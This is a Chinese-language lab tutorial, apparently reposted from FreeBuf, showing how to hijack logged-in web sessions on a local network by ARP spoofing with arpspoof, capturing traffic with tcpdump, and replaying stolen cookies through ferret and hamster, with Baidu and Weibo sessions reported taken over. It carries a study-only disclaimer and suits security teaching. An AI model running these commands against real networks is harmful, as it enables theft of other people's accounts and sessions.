中间人攻击之劫持登陆会话

中间人攻击之劫持登录会话

因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。

因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。

视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws

注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用

0×00

用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 进行ARP欺骗

tcpdump抓去打到本地的数据包

Ferret用来处理抓下来的数据包的

Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。

0×01

拓扑环境:

攻击机:Kali 192.168.1.106

    1406206137211.png!small

受害机:Windows7 192.168.1.100

    14062061396775.png!small

网关:192.168.1.1

0×02

    我的几个社区帐号都是登录状态,当然未登录也是可以劫持的

    14062061415644.png!small

    14062061432001.png!small

    14062061461855.png!small

先看下我在Kali的机器上是未登录的    

 14062061499489.png!small

    14062061501407.png!small

    1406206151378.png!small

0×03

开始arp欺骗

14062061523440.png!small  

命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

0×04

    捕获数据包

    14062061546187.png!small    

命令:tcpdump -i eth0 -w cookie.cap

0×05

模拟受害者登录

受害者在受害机器上就随便刷新一下或者登录一下

完毕

下面我们开始重点

0×06

处理抓去的数据包

14062061565934.png!small

ferret -r cookie.cap

自动生成了 hamster.txt

 14062061573275.png!small 

0×07

开启hamster服务

     14062067209282.png!small 

0×08

打开浏览器,使用代理

0×09

打开hamster 浏览器输入http://hamster

    14062061601080.png!small

选择目标

    14062061631884.png!small

0x0A    

找敏感地址

1406206163520.png!small

 

0x0B

百度劫持成功

   1406206165604.png!small

微博劫持成功

    14062061661684.png!small

都成功了

    14062061686545.png!small

 

0x0C

我在实验的时候碰见一个问题,就是突然上不到网

下面教大家解决

编辑/etc/NetworkManager/NetworkManager.conf

    14062061699537.jpg!small

vi /etc/NetworkManager/NetworkManager.conf

改成true后保存

    14062065287892.png!small

service network-manager restart

重启服务 



原文来自:www.hackbase.com  来源:freebuf

你可能感兴趣的:(攻击机,数据包,中间人)